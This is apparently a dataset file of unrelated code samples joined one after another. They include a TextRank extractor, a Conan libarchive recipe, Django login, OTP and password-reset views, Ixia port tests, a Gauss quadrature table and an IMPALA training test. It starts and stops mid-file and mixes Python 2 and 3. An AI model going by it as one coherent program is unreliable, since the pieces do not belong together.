            for i in range(matrix.shape[0]):
                sum += matrix[i][j]
            for i in range(matrix.shape[0]):
                matrix[i][j] /= sum
        # keep the vocabulary maps
        self.word_index_dic = word_index_dic
        self.index_word_dic = index_word_dic
        return matrix
    def cal_text_rank(self):
        """Run the damped power iteration and store the importance vector."""
        self.matrix = self.build_graph()
        imp_matrix = np.ones([self.word_length, 1])
        for _ in range(0, self.step):
            imp_matrix_hat = (1 - self.alpha) + self.alpha * np.dot(self.matrix, imp_matrix)
            # a convergence test could terminate early here
            ###########
            imp_matrix = imp_matrix_hat
        self.imp_matrix = imp_matrix
    def print_result(self):
        """Print every word with its importance score, highest first."""
        word_imp = {}
        for index in range(0, len(self.imp_matrix)):
            word_imp[self.index_word_dic[index]] = self.imp_matrix[index][0]
        result = sorted(word_imp.items(), key=lambda x:x[1], reverse=True)
        for item in result:
            print item[0] + ':' + str(item[1])
    def top_n_seg(self, top_n=5):
        """Return the *top_n* (word, score) pairs with the highest importance."""
        word_imp = {}
        for index in range(0, len(self.imp_matrix)):
            word_imp[self.index_word_dic[index]] = self.imp_matrix[index][0]
        result = sorted(word_imp.items(), key=lambda x:x[1], reverse=True)
        return result[:top_n]
    def seg_merge(self, top_n=20):
        """Merge top-ranked words that sit next to each other in the
        original segmentation into multi-word phrases.
        """
        _top_seg = self.top_n_seg(top_n=top_n)
        top_seg = [seg[0] for seg in _top_seg]
        top_merge_seg = list()
        seg_index = list()
        doc_length = len(self.origin_doc_seg_list)
        # positions of every top word in the original token stream
        for seg in top_seg:
            seg_index += [index for index, _ in enumerate(self.origin_doc_seg_list) if _==seg]
        seg_index = sorted(seg_index, key=lambda x:x, reverse=False)
        # merge runs of consecutive positions
        cache_list = list()
        for n in seg_index:
            if n not in cache_list:
                merge_list = list()
                merge_list.append(n)
                for addition in range(1, top_n):
                    if n + addition in seg_index:
                        merge_list.append(n + addition)
                    else:
                        break
                if len(merge_list) > 1:
                    top_merge_seg.append(merge_list)
                    cache_list += merge_list
            else:
                continue
        # join each run back into a phrase string
        result_list = list()
        for _merge_list in top_merge_seg:
            result_string = ''
            for index in _merge_list:
                result_string += self.origin_doc_seg_list[index]
            result_list.append(result_string)
        return result_list
if __name__ == '__main__':
    # demo: first a short bio, then a longer sports article (overwrites doc)
    doc = u'程序员(英文Programmer)是从事程序开发、维护的专业人员。一般将程序员分为程序设计人员和程序编码人员,但两者的界限并不非常清楚,特别是在中国。软件从业人员分为初级程序员、高级程序员、系统分析员和项目经理四大类。'
    doc = """
网易体育2月11日讯:^M
2007/2008赛季CBA联赛总决赛首回合比赛^M
将于北京时间2月13日晚7点半正式打响^M
,首场较量华南虎广东宏远将坐镇主场迎接东北虎辽宁盼盼的挑战,比赛打到这个份上,总
冠军奖杯近在咫尺,谁都不想遗憾地错过,本轮比赛,两只老虎势必会有一场殊死之战。^M
相对于篮球场上其它位置,大前锋在队上担任的任务几乎都是以苦工为主,要抢篮板、防守
、卡位都少不了他,但是要投篮、得分,他却经常是最后一个,从一定程度上说,大前锋是
篮球场上最不起眼的。但是就是这个位置,却往往在比赛中扮演着至关重要的角色。下面就
让我们来比较以下两队在这个位置上的人员配置。^M
广东队这个位置杜锋、朱芳雨都能独挡一面,即使在国内篮坛来说,这个人员储备都称得上
是豪华。辽宁队的刘相韬、李晓旭与谷立业就队内来说也是这个位置上的好手。但是把他们
放到一个同等的界面上来说,却又有很大的不同。^M
国内名气方面:^M
广东队无疑要远远胜于辽宁,无论是杜锋还是朱芳雨都是国字号球员,在国内篮坛都是赫赫
有名的角色,相比较而言,辽宁队的刘相韬,谷立业尽管在辽宁上有一些名气,但是在国内
篮坛他们还远称不上“大腕”。^M
个人技术方面:
"""
    # window_size=6, alpha=0.85, 700 power-iteration steps
    thunlp_model = thulac.thulac(seg_only=False, model_path=THUNLP_MODEL_PATH, user_dict=THUNLP_USER_DIC_PATH)
    model = TextSummary4Seg(doc, 6, 0.85, 700, thunlp_model)
    # model.print_result()
    # for seg in model.origin_doc_seg_list:
    #     print seg
    top_n_seg = model.top_n_seg(10)
    top_n_seg_merge = model.seg_merge(20)
    pass
3314326 | from conans import ConanFile, AutoToolsBuildEnvironment, tools
class LibarciveConan(ConanFile):
    """Conan recipe that builds libarchive 3.3.3 from the upstream tarball.

    NOTE(review): the class name keeps the original "Libarcive" spelling;
    renaming it could break external references to this recipe.
    """
    name = "libarchive"
    version = "3.3.3"
    license = "https://raw.githubusercontent.com/libarchive/libarchive/master/COPYING"
    author = "<NAME> <<EMAIL>>"
    url = "https://github.com/appimage-conan-community/conan-libarchive"
    description = "Libarchive for use in AppImage"
    topics = ("libarchive", "iso", "tar")
    settings = "os", "compiler", "build_type", "arch"
    options = {"shared": [True, False], "fPIC": [True, False]}
    default_options = {"shared": False, "fPIC": True}
    def source(self):
        # Fetch and unpack the pinned upstream release.
        tools.download("https://libarchive.org/downloads/libarchive-3.3.3.tar.gz",
                       "libarchive-3.3.3.tar.gz")
        tools.untargz("libarchive-3.3.3.tar.gz")
    def build(self):
        """Configure, build and install with autotools, honouring the options."""
        autotools = AutoToolsBuildEnvironment(self)
        autotools.fPIC = True
        env_build_vars = autotools.vars
        # Library only: disable the bundled tools and every optional
        # compression/crypto/XML backend except zlib.
        configure_args = ["--disable-bsdtar", "--disable-bsdcat", "--disable-bsdcpio", "--with-zlib",
                          "--without-bz2lib", "--without-iconv", "--without-lz4", "--without-lzma", "--without-lzo2",
                          "--without-nettle", "--without-openssl", "--without-xml2", "--without-expat"]
        if self.options["shared"]:
            configure_args += ["--enable-shared", "--disable-static"]
        else:
            configure_args += ["--disable-shared", "--enable-static"]
        if self.options["fPIC"]:
            configure_args += ["--with-pic"]
        autotools.configure(configure_dir="libarchive-3.3.3", vars=env_build_vars,
                            args=configure_args)
        autotools.make(vars=env_build_vars)
        autotools.install(vars=env_build_vars)
    def package_info(self):
        # Consumers link against "archive"; expose the pkg-config dir too.
        self.cpp_info.libs = ["archive"]
        self.cpp_info.builddirs = ["lib/pkgconfig/"]
| StarcoderdataPython |
131452 | <filename>test.py
# coding: utf-8
f = open('input_names.txt', 'r', encoding='utf-8')
# NOTE(review): `content` is read but never used below — presumably the
# caller feeds lines of it to infer(); confirm intended usage.
content = f.read()
f.close()
from inference_helper import InferenceHelper
infer_helper = InferenceHelper()
# load the Chinese person-name NER model; mute/timeit flags keep it quiet
infer_helper.init(model_path='models/NER_cn_names_artificial_data_0.9830_0.9821_14.h5', mode='name', timeit=False, mute=True)
#infer_helper.init(model_path='models/NER_cn_names_artificial_data_0.9740_0.9727_3.h5', mode='name', timeit=False, mute=True)
def infer(s):
    """Run NER over *s* and print it with [person names] bracketed.

    NOTE(review): nesting reconstructed from unindented source — if a new
    B-NAME starts immediately after a name, the bracket is closed without
    opening a new one; confirm against the original repository.
    """
    sentences, tags = infer_helper.infer(s)
    if len(sentences) > 0 and len(tags.keys()) > 0:
        tokens = sentences[0]['tokens']
        # BIO labels of the first tag set, aligned with tokens
        bios = tags[list(tags.keys())[0]][0]
        out_str = ''
        name = ''  # characters of the name currently being collected
        for i in range(len(tokens)):
            c = tokens[i]
            if name == '':
                if bios[i] == 'B-NAME':
                    # a name starts here: open the bracket first
                    name += c
                    out_str += '['
                out_str += c
            elif bios[i] == 'I-NAME':
                name += c
                out_str += c
            else:
                # current name ended: close the bracket before this char
                out_str += ']' + c
                name = ''
        if name != '':
            # input ended while still inside a name
            out_str += ']'
        print(out_str)
| StarcoderdataPython |
# Send out alerts based on a conditional statement
# (exercise snippet: streets_v_count, str_critical_arn, sns and contacts
#  are defined by earlier steps of the exercise, not in this file)
# If there are over 100 potholes, create a message
if streets_v_count > 100:
    # The message should contain the number of potholes.
    message = "There are {} potholes!".format(streets_v_count)
    # The email subject should also contain number of potholes
    subject = "Latest pothole count is {}".format(streets_v_count)
    # Publish the email to the streets_critical topic
    sns.publish(
        TopicArn = str_critical_arn,
        # Set subject and message
        Message = message,
        Subject = subject
    )
# Send one of messages. If the messages are required more often then a subscription topic would be required
# Loop through every row in contacts
for idx, row in contacts.iterrows():
    # Publish an ad-hoc sms to the user's phone number
    response = sns.publish(
        # Set the phone number
        PhoneNumber = str(row['Phone']),
        # The message should include the user's name
        Message = 'Hello {}'.format(row['Name'])
    )
    print(response)
| StarcoderdataPython |
1635028 | <gh_stars>0
######################################
# Django 模块
######################################
from django import forms
######################################
# 自定义模块
######################################
# from .forms import *
######################################
# User login form
######################################
class UerLoginForm(forms.Form):
    # NOTE(review): name looks like a typo for "UserLoginForm"; kept as-is
    # because other modules may import it under this name.
    username = forms.CharField(max_length=20, min_length=4, required=True)
    password = forms.CharField(max_length=20, min_length=6, required=True)
######################################
# Forgot-password form
######################################
class UserForgetPasswordForm(forms.Form):
    """Collects the email address to send a password-reset link to."""
    email = forms.EmailField(required=True)
######################################
# Edit user profile form
######################################
class ChangeUserInfoForm(forms.Form):
    """Editable profile attributes of an existing user."""
    user_name = forms.CharField(max_length=10)
    mobile = forms.CharField(max_length=20, required=False)
    gender = forms.IntegerField()
    # position = forms.ForeignKey(UserPosition, verbose_name='position', on_delete=forms.CASCADE, required=False)
    comment = forms.CharField(max_length=200, required=False)
######################################
# Change password form
######################################
class ChangeUserPasswordForm(forms.Form):
    """Current password plus new password entered twice (confirmation)."""
    cur_password = forms.CharField(min_length=6, max_length=20, required=True)
    new_password = forms.CharField(min_length=6, max_length=20, required=True)
    renew_password = forms.CharField(min_length=6, max_length=20, required=True)
######################################
# Add organization/unit form
######################################
class AddUnitForm(forms.Form):
    """Fields for creating a unit; only the name is mandatory."""
    name = forms.CharField(max_length=30,required=True)
    connect = forms.CharField(max_length=30,required=False)
    connect_phone = forms.CharField(max_length=30,required=False)
    comment = forms.CharField( max_length=200,required=False)
    address = forms.CharField( max_length=50,required=False)
######################################
# Edit organization/unit form
######################################
class EditUnitForm(forms.Form):
    """Same shape as AddUnitForm; used when updating an existing unit."""
    name = forms.CharField(max_length=30,required=True)
    connect = forms.CharField(max_length=30,required=False)
    connect_phone = forms.CharField(max_length=30,required=False)
    comment = forms.CharField( max_length=200,required=False)
    address = forms.CharField( max_length=50,required=False)
######################################
# Add department form
######################################
class AddDeptForm(forms.Form):
    """Fields for creating a department; only the name is mandatory."""
    name = forms.CharField(max_length=20,required=True)
    connect = forms.CharField(max_length=30,required=False)
    connect_phone = forms.CharField( max_length=30,required=False)
    comment = forms.CharField(max_length=1000,required=False)
######################################
# Edit department form
######################################
class EditDeptForm(forms.Form):
    """Same shape as AddDeptForm; used when updating an existing department."""
    name = forms.CharField(max_length=20,required=True)
    connect = forms.CharField(max_length=30,required=False)
    connect_phone = forms.CharField( max_length=30,required=False)
    comment = forms.CharField( max_length=1000,required=False)
######################################
# Add user form
######################################
class AddUserForm(forms.Form):
    """Minimal user-creation form; mobile/password fields are disabled."""
    user_name = forms.CharField(max_length=20, required=True)
    # mobile = forms.CharField(min_length=6, max_length=20, required=True)
    # password = forms.CharField(min_length=6, max_length=20, required=True)
######################################
# Edit user form
######################################
class EditUserForm(forms.Form):
    """Only the display name is editable through this form."""
    user_name = forms.CharField(max_length=20, required=True)
| StarcoderdataPython |
3200693 | from boa3.builtin import public
from boa3_test.test_sc.import_test.FromImportUserModuleRecursiveImport import from_import_empty_list
@public
def empty_list() -> list:
    """Public contract entry point: delegate to the recursively-imported
    helper and return its result (an empty list, per the helper's name)."""
    return from_import_empty_list()
| StarcoderdataPython |
4833669 | <filename>libsortvis/algos/selectionsort.py
def selectionsort(lst):
    """In-place selection sort that reports each real swap via lst.log()."""
    for last in reversed(range(len(lst))):
        biggest = lst.index(max(lst[:last + 1]))  # deliberately naive lookup
        lst[biggest], lst[last] = lst[last], lst[biggest]
        if biggest != last:
            # Only record steps that actually moved an element.
            lst.log()
| StarcoderdataPython |
3367687 | <filename>tests/layer1/test_layer1_uhd.py<gh_stars>1-10
import pytest
@pytest.fixture
def ixn_session(api):
    # Push an empty config so each test starts from a clean session, then
    # hand back the underlying IxNetwork (restpy) handle used for validation.
    api.set_config(api.config())
    ixn = api.assistant.Session.Ixnetwork
    return ixn
@pytest.mark.l1_manual
@pytest.mark.parametrize(
    "speed",
    [
        "speed_100_gbps",
        "speed_40_gbps",
        "speed_25_gbps",
        "speed_10_gbps",
        "speed_50_gbps",
    ],
)
def test_layer1_uhd(api, ixn_session, utils, speed):
    """
    Layer1 test specific to UHD devices.
    script will fetch the port location and figure out the card group,
    then configures the port with supported speed in each test iteration.
    Validation: validate the speed configured and the fanout ports via
    restpy.
    """
    chassis = ixn_session.AvailableHardware.Chassis.find()
    if chassis.ChassisType != "Ixia UHD":
        pytest.skip("Skipping as the chassis is not UHD")
    port = utils.settings.ports[0].split("/")[-1]
    config = api.config()
    # Bug fix: the original unpacked and indexed get_resource()'s result
    # *before* asserting it was not None, so a missing resource surfaced as a
    # TypeError instead of a clear assertion failure.
    resource = get_resource(chassis, speed, port)
    assert resource is not None
    res_map, index = resource
    port = "localuhd/" + res_map[speed][0][0]
    p1 = config.ports.port(name="p1", location=port)[-1]
    l1 = config.layer1.layer1()[-1]
    l1.port_names = [p1.name]
    l1.speed = speed
    l1.media = utils.settings.media
    l1.auto_negotiate = True
    l1.ieee_media_defaults = False
    l1.auto_negotiation.link_training = False
    l1.auto_negotiation.rs_fec = True
    api.set_config(config)
    # Validate the aggregation mode and the number of active fan-out ports.
    card = chassis.Card.find()[index]
    assert card.Aggregation.find().Mode == res_map[speed][-1]
    assert len(card.Aggregation.find().ActivePorts) == len(res_map[speed][0])
def get_resource(chassis, speed, port):
    """Locate the card offering *speed* on *port*.

    Returns ``(speed_to_ports_map, card_index)`` for the first matching card,
    or ``None`` when no aggregation-capable card offers that speed/port.
    """
    res_map = get_speed_to_resource_map(chassis)
    for card_index in res_map:
        # Robustness fix: a card that does not support the requested speed is
        # skipped instead of raising KeyError.
        speed_entry = res_map[card_index].get(speed)
        if speed_entry is None:
            continue
        for candidate in speed_entry[0]:
            # Bug fix: the original used re.match("^<port>", candidate) -- a
            # prefix match, so port "1" wrongly matched "10" or "16.1".
            # Match the exact port id, optionally followed by a fan-out lane.
            if candidate == port or candidate.startswith(port + "."):
                return (res_map[card_index], card_index)
    return None
def get_speed_to_resource_map(chassis):
    """Build {card_index: {speed_name: (port_id_list, aggregation_mode)}}.

    Port ids are 1-based and allotted 8 per card; fan-out modes expand each
    physical port into "port.lane" entries.
    """
    mode_table = {
        "uhdOneHundredEightByHundredGigNonFanOut": {
            "name": "speed_100_gbps",
            "fanout": 8,
        },
        "uhdOneHundredEightByFortyGigNonFanOut": {
            "name": "speed_40_gbps",
            "fanout": 8,
        },
        "uhdOneHundredThirtyTwoByTwentyFiveGigFanOut": {
            "name": "speed_25_gbps",
            "fanout": 32,
        },
        "uhdOneHundredThirtyTwoByTenGigFanOut": {
            "name": "speed_10_gbps",
            "fanout": 32,
        },
        "uhdOneHundredSixteenByFiftyGigFanOut": {
            "name": "speed_50_gbps",
            "fanout": 16,
        },
    }
    ports_per_card = 8
    result = dict()
    for card_idx, card in enumerate(chassis.Card.find()):
        if not card.AggregationSupported:
            continue
        first = ports_per_card * card_idx + 1
        stop = ports_per_card * (card_idx + 1) + 1
        speeds = dict()
        for mode in card.Aggregation.find().AvailableModes:
            entry = mode_table.get(mode)
            if entry is None:
                continue
            lanes = entry["fanout"] // ports_per_card
            if lanes > 1:
                ports = [
                    "{}.{}".format(p, lane)
                    for p in range(first, stop)
                    for lane in range(1, lanes + 1)
                ]
            else:
                ports = [str(p) for p in range(first, stop)]
            speeds[entry["name"]] = (ports, mode)
        result[card_idx] = speeds
    return result
| StarcoderdataPython |
3200401 | <filename>tests/conftest.py<gh_stars>10-100
# -*- coding: utf-8 -*-
import sys, os
import pytest
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from multiset import Multiset, FrozenMultiset
@pytest.fixture(autouse=True)
def add_default_expressions(doctest_namespace):
    """Make both multiset classes visible inside every doctest."""
    for alias, cls in (('Multiset', Multiset), ('FrozenMultiset', FrozenMultiset)):
        doctest_namespace[alias] = cls
def pytest_generate_tests(metafunc):
    """Parametrize any test that requests the ``MultisetCls`` fixture."""
    if 'MultisetCls' not in metafunc.fixturenames:
        return
    metafunc.parametrize('MultisetCls', ['frozen', 'regular'], indirect=True)
@pytest.fixture
def MultisetCls(request):
    """Indirect fixture: resolve the parameter id to the class under test."""
    param = request.param
    if param == 'frozen':
        return FrozenMultiset
    if param == 'regular':
        return Multiset
    raise ValueError("Invalid internal test config")
| StarcoderdataPython |
156441 | <filename>tests/core/test_peers.py
import random
from pyslab.core.types import Cell
from pyslab.core.peers import (
row_peer_cells,
column_peer_cells,
box_peer_cells,
all_peer_cells,
)
def test_correct_row_peers():
    """Row peers are every other column in the same row, in column order."""
    candidate_cols = list(range(9))
    random.shuffle(candidate_cols)
    col = candidate_cols.pop()
    row = random.randint(0, 8)
    expected = [Cell(row, c) for c in sorted(candidate_cols)]
    assert row_peer_cells(Cell(row, col)) == expected
def test_correct_column_peers():
    """Column peers are every other row in the same column, in row order."""
    candidate_rows = list(range(9))
    random.shuffle(candidate_rows)
    row = candidate_rows.pop()
    col = random.randint(0, 8)
    expected = [Cell(r, col) for r in sorted(candidate_rows)]
    assert column_peer_cells(Cell(row, col)) == expected
def test_correct_box_peers():
    """Box peers of (3,3) are the other eight cells of the centre-left box."""
    expected = [
        Cell(r, c)
        for r in range(3, 6)
        for c in range(3, 6)
        if (r, c) != (3, 3)
    ]
    assert box_peer_cells(Cell(3, 3)) == expected
def test_correct_all_peers():
    """All peers = row mates + column mates + remaining box cells."""
    row_mates = {(0, c) for c in range(9) if c != 3}
    col_mates = {(r, 3) for r in range(9) if r != 0}
    box_extras = {(1, 4), (1, 5), (2, 4), (2, 5)}
    expected = sorted(row_mates | col_mates | box_extras)
    assert sorted(all_peer_cells(Cell(0, 3))) == expected
| StarcoderdataPython |
3327034 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 20 12:10:54 2018
@author: thiagoalmeida
"""
class TabelaGauss():
    """Tabulated Gauss-Legendre quadrature nodes and weights for n = 2..8.

    Each row is [abscissa, weight] on the reference interval [-1, 1]; for
    every rule the weights sum to 2 (the interval length).
    Source: http://www.profwillian.com/calcnum/Legendre.htm
    """
    n2 = [
        [-0.5773502691, 1.0000000000],
        [0.5773502691, 1.0000000000]
    ]
    n3 = [
        [-0.7745966692, 0.5555555555],
        [0.0000000000, 0.8888888888],
        [0.7745966692, 0.5555555555]
    ]
    n4 = [
        [-0.8611363115, 0.3478548451],
        [-0.3399810435, 0.6521451548],
        [0.3399810435, 0.6521451548],
        [0.8611363115, 0.3478548451]
    ]
    n5 = [
        [-0.9061798459, 0.2369268850],
        [-0.5384693101, 0.4786286704],
        [0.0000000000, 0.5688888888],
        [0.5384693101, 0.4786286704],
        [0.9061798459, 0.2369268850]
    ]
    n6 = [
        [-0.9324695142, 0.1713244923],
        [-0.6612093864, 0.3607615730],
        [-0.2386191860, 0.4679139345],
        [0.2386191860, 0.4679139345],
        # Bug fix: this row was "[0,6612093864, 0.3607615730]" -- the decimal
        # comma produced a malformed 3-element row with a huge integer.
        [0.6612093864, 0.3607615730],
        [0.9324695142, 0.1713244923]
    ]
    n7 = [
        [-0.9491079123, 0.1294849661],
        [-0.7415311855, 0.2797053914],
        [-0.4058451513, 0.3818300505],
        [0.0000000000, 0.4179591836],
        [0.4058451513, 0.3818300505],
        [0.7415311855, 0.2797053914],
        [0.9491079123, 0.1294849661]
    ]
    n8 = [
        [-0.9602898564, 0.1012285362],
        # Bug fix: was "[-0,7966664774, 0.2223810344]" (decimal comma), i.e. a
        # malformed 3-element row instead of the abscissa -0.7966664774.
        [-0.7966664774, 0.2223810344],
        [-0.5255324099, 0.3137066458],
        [-0.1834346424, 0.3626837833],
        [0.1834346424, 0.3626837833],
        [0.5255324099, 0.3137066458],
        [0.7966664774, 0.2223810344],
        [0.9602898564, 0.1012285362]
    ]
    # Index 0 holds the 2-point rule, ..., index 6 the 8-point rule.
    pontos = [n2, n3, n4, n5, n6, n7, n8]
    def getValores(self, n):
        """Return the [abscissa, weight] rows of the n-point rule (2 <= n <= 8),
        or None for any other n (preserving the original's behavior)."""
        if 2 <= n <= 8:
            return self.pontos[n - 2]
        return None
| StarcoderdataPython |
3331674 | import json
from django.urls import reverse
from django.contrib import messages
from django.utils.encoding import force_text
from django.contrib.auth import login, logout
from django.utils.http import urlsafe_base64_decode
from django.shortcuts import render, get_object_or_404
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import RedirectView, FormView, TemplateView
from .backends import EmailModelBackend
from .forms import (LoginForm, SignUpForm, OTPForm, FPEmailForm,
ChangePasswordForm)
from .models import (BaseUserProfile, OTPVerification,
VerificationLink, ForgotPasswordLink)
from .tasks import create_forgot_password_link
# Create your views here.
class IndexView(LoginRequiredMixin, TemplateView):
    """
    Home view for user after redirection
    """
    template_name = 'frontend/dashboard.html'
    def get_context_data(self, **kwargs):
        # Mark the dashboard nav item active and expose whether the logged-in
        # user has verified their email (templates can show a banner).
        context = super(IndexView, self).get_context_data(**kwargs)
        context['dashboard_page'] = "active"
        user = self.request.user
        context['email_verified'] = user.email_verified
        return context
class LoginView(FormView):
    """
    First authentication step: validates email/password and, on success,
    redirects to the OTP (second-factor) verification view.
    """
    form_class = LoginForm
    template_name = 'frontend/login.html'
    def get_context_data(self, **kwargs):
        # NOTE(review): adds nothing to the context; this override looks
        # removable.
        context = super(LoginView, self).get_context_data(**kwargs)
        return context
    def post(self, request):
        # Credentials are checked manually instead of via FormView.form_valid.
        form = LoginForm(request.POST)
        email = form.data['email']
        password = form.data['password']
        if form.is_valid():
            user_auth = EmailModelBackend()
            user = user_auth.validate_password(password=password, email=email)
            if user:
                # Password OK: hand off to the OTP step for this user.
                otp_id = OTPVerification.objects.get(user=user).id
                return HttpResponseRedirect(
                    reverse('phone-verification-view') + f"?otp_id={otp_id}")
        # Invalid form or wrong credentials: re-render the login page with the
        # submitted email pre-filled.
        context = {
            'form': form,
            "csrf_token": form.data['csrfmiddlewaretoken'], 'email': email
        }
        return render(
            request, context=context, template_name=self.template_name)
class LogOutView(RedirectView):
    """End the current session, then redirect the visitor to the login page."""
    def get_redirect_url(self):
        # Resolve the destination first, then drop the session.
        destination = reverse("login-view")
        logout(self.request)
        return destination
class SignupView(FormView):
    """
    Registers a new user; server-side validation happens in SignUpForm.
    """
    form_class = SignUpForm
    template_name = 'frontend/sign-up.html'
    def post(self, request, *args, **kwargs):
        form = SignUpForm(request.POST)
        email = form.data['email']
        password = form.data['password']  # NOTE(review): read but never used
        if form.is_valid():
            # form.save() creates the user; new accounts go straight to OTP
            # (phone) verification.
            user = form.save()
            otp_id = OTPVerification.objects.get(user=user).id
            return HttpResponseRedirect(
                reverse('phone-verification-view') + f"?otp_id={otp_id}")
        # Validation failed: re-render the sign-up page with errors.
        context = {
            'form': form, "csrf_token": form.data['csrfmiddlewaretoken'],
            'email': email
        }
        return render(
            request, context=context, template_name=self.template_name)
class OTPView(FormView):
    """
    Second authentication step: verifies the one-time password and logs the
    user in on success.
    """
    form_class = OTPForm
    template_name = 'frontend/otp.html'
    def get_context_data(self, **kwargs):
        context = super(OTPView, self).get_context_data(**kwargs)
        otp_id = self.request.GET.get('otp_id')
        context["otp_id"] = otp_id
        # 404 early if otp_id does not reference a real verification record.
        get_object_or_404(OTPVerification, id=otp_id)
        return context
    def post(self, request, *args, **kwargs):
        form = OTPForm(request.POST)
        otp = form.data['otp']
        otp_id = form.data['otp_id']
        if not form.is_valid():
            # Malformed submission: re-render with form errors.
            context = {
                'form': form, "csrf_token": form.data['csrfmiddlewaretoken'],
                'otp_id': otp_id}
            return render(
                request, context=context, template_name=self.template_name)
        else:
            # Existence check only -- raises 404 for unknown ids; the value is
            # intentionally unused.
            otp_verified = get_object_or_404(OTPVerification, id=otp_id)
            user_auth = EmailModelBackend()
            user = user_auth.authenticate(_id=otp_id, otp=otp)
            if user:
                login(self.request, user)
                # Honour a ?next=... redirect after the second factor passes.
                if "next" in self.request.GET:
                    url = self.request.GET["next"]
                    response = HttpResponseRedirect(url)
                    return response
                else:
                    response = HttpResponseRedirect('/home')
                    return response
            else:
                # Wrong code: flash an error and return to the OTP form.
                messages.error(self.request, "Incorrect OTP entered")
                return HttpResponseRedirect(
                    reverse('phone-verification-view') + f"?otp_id={otp_id}")
class LinkExpireView(TemplateView):
    """
    Static page shown when an email-verification or password-reset link is
    unknown or has already been consumed.
    """
    template_name = 'frontend/link-expire.html'
class VerifyLinkView(TemplateView):
    """Confirm a user's email address from the hashed link they were sent.

    The URL slug is the urlsafe-base64 encoding of the email address.
    """
    template_name = "frontend/verification.html"
    def dispatch(self, request, *args, **kwargs):
        # Unknown or already-consumed links bounce to the "link expired" page.
        if not VerificationLink.objects.filter(hash_key=self.kwargs["slug"]).exists():
            return HttpResponseRedirect(reverse("link-expire-view"))
        return super(VerifyLinkView, self).dispatch(request, *args, **kwargs)
    def get_context_data(self, **kwargs):
        context = super(VerifyLinkView, self).get_context_data(**kwargs)
        slug = self.kwargs["slug"]
        context["link"] = get_object_or_404(VerificationLink, hash_key=slug)
        email = force_text(urlsafe_base64_decode(slug))
        # Bug fix: the filter previously used the undefined name `user_id`
        # (NameError at runtime); the lookup must use the decoded email.
        BaseUserProfile.objects.filter(email=email).update(
            is_active=True, email_verified=True)
        # One-shot link: delete it after successful verification.
        VerificationLink.objects.filter(hash_key=slug).delete()
        return context
class ForgotPasswordView(FormView):
    """
    Collects an email address and asynchronously sends a password-reset link.
    """
    form_class = FPEmailForm
    template_name = 'frontend/send-fp-mail.html'
    def post(self, request, *args, **kwargs):
        form = FPEmailForm(request.POST)
        if not form.is_valid():
            context = {
                'form': form, "csrf_token": form.data['csrfmiddlewaretoken'], }
            return render(
                request, context=context, template_name=self.template_name)
        email = form.data['email']
        # Deliberately vague wording so this endpoint cannot be used to probe
        # which email addresses are registered.
        messages.error(self.request, "If your email exists in our database\
            we will send your link to change your password")
        # Link creation + email delivery run asynchronously (task queue).
        create_forgot_password_link.delay(email)
        return HttpResponseRedirect(reverse('forgot-password-view'))
class ForgotPasswordLinkView(FormView):
    """
    Handles the emailed reset link: validates it, then lets the user set a
    new password. The slug is the urlsafe-base64 encoding of the email.
    """
    form_class = ChangePasswordForm
    template_name = 'frontend/forgot-password.html'
    def dispatch(self, request, *args, **kwargs):
        # Unknown or already-used links bounce to the "link expired" page.
        if not ForgotPasswordLink.objects.filter(hash_key=self.kwargs["slug"]).exists():
            return HttpResponseRedirect(reverse("link-expire-view"))
        return super(ForgotPasswordLinkView, self).dispatch(request, *args, **kwargs)
    def get_context_data(self, **kwargs):
        context = super(ForgotPasswordLinkView, self).get_context_data(**kwargs)
        slug = self.kwargs["slug"]
        # Existence check only; raises 404 for unknown links.
        get_object_or_404(ForgotPasswordLink, hash_key=slug)
        return context
    def post(self, request, *args, **kwargs):
        form = ChangePasswordForm(request.POST)
        if not form.is_valid():
            context = {
                'form': form, "csrf_token": form.data['csrfmiddlewaretoken'], }
            return render(
                request, context=context, template_name=self.template_name)
        slug = self.kwargs["slug"]
        email = force_text(urlsafe_base64_decode(slug))
        if BaseUserProfile.objects.filter(email=email).exists():
            user = BaseUserProfile.objects.filter(email=email).first()
            user.set_password(form.data['password'])
            user.save()
            # Single-use link: remove it once the password has been changed.
            ForgotPasswordLink.objects.filter(hash_key=slug).delete()
        # NOTE(review): the success notice is sent via messages.error and the
        # final render passes no context -- confirm both are intentional.
        messages.error(self.request, "We have updated your password")
        return render(
            request, template_name=self.template_name)
| StarcoderdataPython |
1617530 | # Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import time
import unittest
from rlgraph.environments import OpenAIGymEnv
from rlgraph.agents import IMPALAAgent
from rlgraph.spaces import FloatBox
from rlgraph.utils import root_logger
from rlgraph.tests.test_util import config_from_path
class TestIMPALAAgentLongTaskLearning(unittest.TestCase):
    """
    Long-running learning test: checks that the IMPALAAgent can learn on a
    tough Atari environment (Breakout).
    """
    # Module-wide log level, set once at class-definition time.
    root_logger.setLevel(level=logging.INFO)
    #atari_preprocessed_state_space = FloatBox(shape=(80, 80, 4), add_batch_rank=True)
    #atari_preprocessing_spec = [
    #    dict(type="image_crop", x=0, y=25, width=160, height=160),
    #    dict(type="image_resize", width=80, height=80),
    #    dict(type="grayscale", keep_rank=True),
    #    dict(type="divide", divisor=255,),
    #    dict(type="sequence", sequence_length=4, batch_size=1, add_rank=False)
    #]
    def test_impala_on_outbreak(self):
        """
        Creates an IMPALAAgent from a JSON config and repeatedly updates it
        on an OpenAI Breakout env, printing loss and mean episode return.
        """
        env = OpenAIGymEnv("Breakout-v0", frameskip=4, max_num_noops=30, episodic_life=True, visualize=False)
        config_ = config_from_path("configs/impala_agent_for_breakout.json")
        agent = IMPALAAgent.from_spec(
            config_,
            state_space=env.state_space,
            action_space=env.action_space,
        )
        learn_updates = 4000000
        mean_returns = []
        for i in range(learn_updates):
            ret = agent.update()
            mean_return = self._calc_mean_return(ret)
            mean_returns.append(mean_return)
            print("i={} Loss={:.4} Avg-reward={:.2}".format(i, float(ret[1]), mean_return))
